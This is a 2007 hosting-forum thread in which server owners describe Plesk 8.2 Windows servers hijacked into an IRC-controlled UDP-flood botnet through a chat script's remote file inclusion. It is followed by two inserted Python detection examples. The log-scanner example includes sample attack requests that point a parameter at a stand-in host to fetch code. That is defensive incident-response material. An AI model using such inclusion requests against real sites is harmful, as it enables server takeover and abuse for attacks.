Thread: Plesk 8.2 appears vulnerable
-
12-22-2007, 12:01 PM #1 WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
Plesk 8.2 appears vulnerable
This is a post in the SWSoft forum (http://forum.swsoft.com/showthread.p...766#post194766).
I have experienced the same problem; my problem began 40 days ago.
I restarted the server and it didn't come back, so OS reload, restoring Plesk backups. One week later I restarted the server and then the server didn't come back again, so OS reload.
Again and again. I bought a firewall for the server (Cisco Checkpoint X16); this time F-Secure was uninstalled every day. The Planet installed it and it got uninstalled. After all the problems they said 3 days ago that there is a problem with Plesk and I should wait for a solution from SWSoft.
I mention that I had F-Secure from the time I got the server and I had no problem for 4 months.
I also ask anyone who has experienced something like this to tell us.
-
12-22-2007, 09:42 PM #2 Disabled
- Join Date
- Apr 2005
- Location
- Cochin
- Posts
- 2,452
I believe you must send a direct mail to SWSoft support. They would be more than willing to help you, as it's a company that is proud of their product.
Don't forget to post your findings here.
-
12-23-2007, 12:22 AM #3 WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
I have asked The Planet
Hi,
I have asked The Planet and they said this is a vulnerability in Plesk and SWSoft is working on it; if you check, there is a post in the SWSoft forum but no one answered.
My question now is: is this The Planet's problem or SWSoft's? I want to know if anyone has experienced it.
Another thing: I checked the server last night and it seems that someone was on Remote Desktop. I checked and cureit.exe was installed on the desktop and was running. I asked The Planet support chat and they said no one is working on my server.... but I checked cureit.exe, and that is a product from Dr.Web antivirus... do hackers check my system for viruses?
-
12-23-2007, 01:13 AM #4 Newbie
- Join Date
- May 2004
- Posts
- 11
I've seen a UDP flood running from one of our Windows web servers.
It keeps triggering my pager when bandwidth peaks. It was at first consuming up to 100Mbit of bandwidth but I lowered the port to 10Mbit to mitigate damages and keep killing it when it restarts. I've now got it under wraps for this particular botnet by blocking all their IPs.
I found that using tcpview.exe to kill the w3wp.exe process that was connected to IRC servers on 6667 made it stop for a bit until they restarted it. I was able to monitor and get onto the IRC server using wireshark and find out some additional details. The botnet was run by two users who are using it to UDP flood some nameservers and had 500+ bots on the server.
I think this may be in Plesk as stated and have applied the latest Plesk 8.2.0.1 updates.
I can't find any good rootkit revealer type tools for 64-bit Windows, but I'm pretty sure Win64 isn't supposed to have as many problems with rootkits because of driver signing and the fact that most are written for 32-bit.
If it is a new Plesk issue I hope a patch is released shortly!
-
12-23-2007, 03:39 AM #5 Disabled
- Join Date
- Apr 2005
- Location
- Cochin
- Posts
- 2,452
-
12-23-2007, 02:47 PM #6 WHT Addict
- Join Date
- Sep 2003
- Posts
- 111
Hi,
I see the same problem on servers which are located in different datacenters. Plesk is vulnerable, not The Planet.
Hackers use your server for sharing DivX videos or attacking other servers.
-
12-23-2007, 02:49 PM #7 WHT Addict
- Join Date
- Sep 2003
- Posts
- 111
-
12-23-2007, 04:26 PM #8 WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
Are you sure?
Hi,
I am still in doubt...
The user was logged in as administrator with client name VZWIN2 (the user name was administrator; the client name is not the user name, it is the computer name of the person who logged in).
I have sent several PMs by Task Manager but no answer. Also, The Planet support told me that when he logged in to his session nothing was running, and when he closed the session everything that was running and that I saw in Task Manager closed.
Now the new question is: is client name VZWIN2 one of SWSoft support's computer names?
Why didn't he answer??
Or if he is a hacker and has remote desktop, why didn't he delete data or change it? I am really worried and becoming crazy.
Regards,
Hamed
-
12-23-2007, 08:41 PM #9 Newbie
- Join Date
- May 2004
- Posts
- 11
I keep seeing outbound connections to remote servers on port 6667 from w3wp.exe. I can kill this in TCPView and it doesn't affect other services.
Anyone know a good software firewall that works on Win2003 64-bit? I need to block outgoing connections to most ports; unfortunately Plesk moved to Windows Firewall from RRAS, which doesn't do this.
For now I've added bogus routes for the IPs they've connected to and this has stopped all the outbound connections for a good 24 hours.
I guess it's time to get a Juniper device going unless there's an IPCHAINS / APF equivalent for Win that's reliable?
I welcome any input on this as it's been very frustrating.
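The check post #9 describes doing by hand in TCPView (finding which w3wp.exe worker holds connections to IRC port 6667, killing it, and null-routing the remote IPs) can be scripted. The following is an added example, not code from the thread or from Plesk: it correlates `netstat -ano` output with `tasklist /fo csv /nh` output and reports the worker PIDs and remote addresses. The netstat and tasklist text is constructed for the example, and the IRC port range beyond 6667 is an assumption.

```python
"""Added example (not from the thread or from Plesk): flag outbound
connections to IRC ports from IIS worker processes by correlating
`netstat -ano` with `tasklist` output, which is the check the poster
performed by hand in TCPView. The netstat and tasklist text below is
constructed for this example, not captured from a real host."""
import csv
import io
import re

# IRC servers conventionally listen on 6660-6669 and 7000; the thread
# only reports 6667, the rest are included as an assumption.
IRC_PORTS = set(range(6660, 6670)) | {7000}

# Constructed `netstat -ano` output in the Windows column layout.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1412
  TCP    192.0.2.10:1055        198.51.100.7:6667      ESTABLISHED     2308
  TCP    192.0.2.10:1061        198.51.100.7:6667      ESTABLISHED     2308
  TCP    192.0.2.10:3389        203.0.113.5:51022      ESTABLISHED     776
  UDP    192.0.2.10:1080        *:*                                    2308
"""

# Constructed `tasklist /fo csv /nh` output: image name, PID, session, ...
TASKLIST_SAMPLE = """\
"System Idle Process","0","Console","0","16 K"
"svchost.exe","1412","Console","0","5,120 K"
"w3wp.exe","2308","Console","0","41,300 K"
"svchost.exe","776","Console","0","3,900 K"
"""

# Proto, local, foreign, optional state (UDP rows have none), PID.
NETSTAT_ROW = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


def parse_netstat(text):
    """One dict per socket row; the header line does not match the regex."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if m:
            proto, local, foreign, state, pid = m.groups()
            rows.append({"proto": proto, "local": local, "foreign": foreign,
                         "state": state or "", "pid": int(pid)})
    return rows


def parse_tasklist(text):
    """Map PID -> image name from CSV tasklist output."""
    reader = csv.reader(io.StringIO(text))
    return {int(row[1]): row[0] for row in reader if len(row) >= 2}


def split_endpoint(endpoint):
    """'198.51.100.7:6667' -> ('198.51.100.7', 6667); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def find_irc_connections(netstat_text, tasklist_text):
    """Every socket whose remote port is an IRC port, with the owning image name."""
    images = parse_tasklist(tasklist_text)
    hits = []
    for row in parse_netstat(netstat_text):
        host, port = split_endpoint(row["foreign"])
        if port in IRC_PORTS:
            hits.append({"pid": row["pid"], "image": images.get(row["pid"], "?"),
                         "remote": host, "port": port, "state": row["state"]})
    return hits


def worker_pids_to_recycle(hits, image="w3wp.exe"):
    """PIDs of IIS worker processes holding IRC connections (kill/recycle candidates)."""
    return sorted({h["pid"] for h in hits if h["image"].lower() == image})


def remote_ips_to_block(hits):
    """Distinct remote addresses seen on IRC ports, the set the poster null-routed."""
    return sorted({h["remote"] for h in hits})


if __name__ == "__main__":
    found = find_irc_connections(NETSTAT_SAMPLE, TASKLIST_SAMPLE)
    for h in found:
        print(f"{h['image']} (pid {h['pid']}) -> {h['remote']}:{h['port']} {h['state']}")
    print("recycle:", worker_pids_to_recycle(found))
    print("block:", remote_ips_to_block(found))
```

Run it with the real command output piped into the two parsers. Killing the worker is only a stopgap, as the poster found: the application pool restarts it and the infected site reconnects, so the reported PID tells you which pool to inspect, and the remote address list tells you what to null-route while you find the site that is being abused.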
-
12-23-2007, 09:21 PM #10 Disabled
- Join Date
- Apr 2005
- Location
- Cochin
- Posts
- 2,452
-
12-24-2007, 01:55 AM #11 WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
Let me explain my problem fully
Hi,
Let me explain my problem fully and you tell me if it could be a hack.
I had no problem till I did the first OS reload. After that the server was OK for one week, till The Planet updated my F-Secure, and after a restart the server went down, and they said another OS reload. Again they did an update on my F-Secure and another restart; nothing happened, but exactly a week later, on the second restart, the server didn't respond. This time the outage ticket went on so long, and they brought back my server but with no RDP; they just installed VNC and told me to use that.
They told me some changes in the Registry closed RDP, but I asked a security person and he told me that for changes in the Registry someone needs to log in with the Administrator role.... But if he logged in as administrator, why did he close RDP? Why didn't he delete data or change data?
After that I did another OS reload and then ordered a Cisco firewall and F-Secure was installed again, but some days later I saw an email on my server... IP alert, server was restarted. I logged into the server and saw... wow... F-Secure was uninstalled? I created a ticket and TP installed it again; another restart, the server comes back. Again the day after that I came back: no F-Secure but no restart... they said this is an SWSoft problem? Could it be?
Could it really be a hack?
Regards,
Hamed
-
12-24-2007, 02:15 AM #12 WHT Addict
- Join Date
- Sep 2007
- Location
- Planet Earth
- Posts
- 154
Hi,
Let me butt in if I may. From the conversation you seem to be having, you are using a WINDOWS version of PLESK 8.2. If you read very carefully through the product manuals given out by SWSoft, they prefer LINUX as their operating system of choice because of its stability and, well, ability to resist hackers.
PLESK 8.2 on LINUX is safer than PLESK (anything) on WINDOWS2003 (32/64). I know this for a fact because I used to host WINDOWS 2003 Dual AMD 64's and had nothing but problems. I am now lucky if I get an email a month from my members because I converted to just LINUX RED HAT AS 4.6 with PLESK 8.2
If you are having problems it is more than likely because you are on a WINDOWS based system.
- 64bithost
Professional Plesk Webhosting.
No overselling.
Always available for you.
http://www.64bithost.com - 1-352-3164619
-
12-24-2007, 02:21 AM #13 WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
This was not my answer
Hi,
This was not my answer... I want to know, could this situation be a hack? Could it be from Plesk?
Is someone from The Planet doing that?....
Regards,
Hamed
-
12-24-2007, 02:29 AM #14 WHT Addict
- Join Date
- Sep 2007
- Location
- Planet Earth
- Posts
- 154
I cannot answer as to the actual fact of whether it is a "hack". To better answer your question, email Dennis at swsoft.com; his email address is info@swsoft.com. Sometimes SWSoft will log in to your Windows server and put software on it to monitor new changes. You will see, if you have 'root' access, that someone has logged in to the VZ, and that is all I'm going to expose in a public forum about PLESK. Dennis is their security officer/main programmer and can explain it to you in confidential email.
-
12-24-2007, 04:06 AM #15 WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
Please help me
I have sent mail, but regarding my last emails I know they won't answer.
I hope I can get an answer from the specialists and server owners who are in this forum.
Please give me the way to make sure if it is a hack or from SWSoft.
Regards
-
12-25-2007, 02:08 AM #16 WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
They don't answer, they asked for money
Hi,
I got an email from them and they said create a ticket and pay money to get an answer.
It seems nobody is ready to say if this problem is from Plesk or...?
Any opinion?
Regards,
Hamed
-
12-25-2007, 12:56 PM #17 Junior Guru Wannabe
- Join Date
- Aug 2007
- Posts
- 60
It's not that they are being lazy, or trying to say it is not their problem. You are looking for an answer that no one has yet. If SWSoft, The Planet, ANYONE... had the answer, a patch would be released (official or not).
Do some recon, set up a honeypot, block some IPs, see what you can find yourself; it will only help bring everyone closer to a solution.
The Planet uses Linux workstations. I'm not sure what rdesktop identifies as (maybe VZWIN2). It is also very possible it is SWSoft, as VZ is something they use a lot (VZMC, Virtuozzo, VZPP, VZCP, vzctl, etc...).
While it is not very nice that they did not respond to you, this does not mean it was not a tech. When you are trying to do your job, and investigate something, and a customer wants to chat with you about the problem... It can be quite distracting, so messages like those are often ignored.
-
01-08-2008, 11:24 PM #18 New Member
- Join Date
- Jan 2008
- Posts
- 1
w3wp UDP Flood
I have had one of our Windows Server 2003 systems spiking our bandwidth at near 100% the past few weeks. I have had to manually kill the w3wp processes running on UDP (using tcpview).
I host many websites on this system. We separated them all into individual application pools, and we narrowed it down to one website. Looking through the logs revealed an exploit in a flash chat script we're using. We renamed the chat folder to something not linked or guessable and it went away.
You will not find an infected file on your system. The attack is including a remote file via http that opens up an IRC channel on port 6667 then listens for commands to start a ddos attack with UDP packets, etc.
Google aedating4CMS and you will find out much about the hack.
Hope this helps anyone. I spent much time tracking this down and wanted to share to help!
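Post #18 describes the root cause as a remote file inclusion: a request to the chat script carries a URL as a parameter value, the script fetches that file over HTTP, and the fetched code opens the IRC connection. That pattern is visible in the IIS logs without any infected file on disk. The following is an added example, not code from the thread or from the chat script's vendor: it parses IIS 6 W3C extended log lines, flags every request whose query string has a URL-valued parameter, and counts the hits per site and script so the abused application can be isolated the way the poster did with application pools. The log lines, the `/chat/index.php` path and the `dir` parameter name are constructed placeholders, not the real script's names.

```python
"""Added example (not from the thread or from the chat script's vendor):
scan IIS 6 W3C extended log lines for remote-file-inclusion attempts, i.e.
a query-string parameter whose value is itself a URL, and count the hits
per site and script so the offending application can be isolated the way
post #18 did with application pools. The log text, the /chat/ path and the
`dir` parameter name are constructed placeholders."""
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed IIS 6 log excerpt; W3SVC12 and W3SVC7 are two sites on one host.
IIS_LOG_SAMPLE = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2007-12-20 03:00:00
#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2007-12-20 03:11:02 W3SVC12 192.0.2.10 GET /chat/index.php - 80 - 203.0.113.9 Mozilla/4.0+(compatible) 200 0 0
2007-12-20 03:11:09 W3SVC12 192.0.2.10 GET /chat/index.php dir=http://198.51.100.20/inc.txt 80 - 203.0.113.9 Mozilla/4.0+(compatible) 200 0 0
2007-12-20 03:12:41 W3SVC12 192.0.2.10 GET /chat/index.php dir=http%3A%2F%2F198.51.100.20%2Finc.txt 80 - 203.0.113.9 libwww-perl/5.805 200 0 0
2007-12-20 03:14:00 W3SVC7 192.0.2.10 GET /news/list.php page=2 80 - 198.51.100.44 Mozilla/5.0 200 0 0
2007-12-20 03:15:30 W3SVC7 192.0.2.10 GET /redirect.asp url=http://www.example.com/ 80 - 198.51.100.44 Mozilla/5.0 302 0 0
"""

# A parameter value that is itself an absolute URL (after URL-decoding).
URL_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def parse_iis_log(text):
    """Turn W3C log lines into dicts keyed by the names in the #Fields directive."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign
        records.append(dict(zip(fields, parts)))
    return records


def rfi_hits(records):
    """Requests whose query string carries a URL as a parameter value."""
    hits = []
    for r in records:
        query = r.get("cs-uri-query", "-")
        if query == "-":  # IIS logs '-' when there is no query string
            continue
        for key, value in parse_qsl(query, keep_blank_values=True):
            if URL_VALUE.match(value):
                hits.append({"site": r["s-sitename"], "stem": r["cs-uri-stem"],
                             "param": key, "value": value, "client": r["c-ip"],
                             "status": r["sc-status"]})
    return hits


def hits_by_script(hits):
    """Count hits per (site, script path); the top entry is where to look first."""
    return Counter((h["site"], h["stem"]) for h in hits)


if __name__ == "__main__":
    found = rfi_hits(parse_iis_log(IIS_LOG_SAMPLE))
    for (site, stem), n in hits_by_script(found).most_common():
        print(f"{site} {stem}: {n} URL-valued parameter(s)")
    for h in found:
        print(f"  {h['client']} {h['stem']}?{h['param']}=... status {h['status']}")
```

A URL-valued parameter is not proof of an attack by itself: the constructed `/redirect.asp` line is what a legitimate redirector looks like, so rank by script and review the top entries rather than blocking on every hit. Once the script is identified, the lasting fix is to patch or remove it; renaming the folder, as the poster did, only hides it from requests that already know the old path.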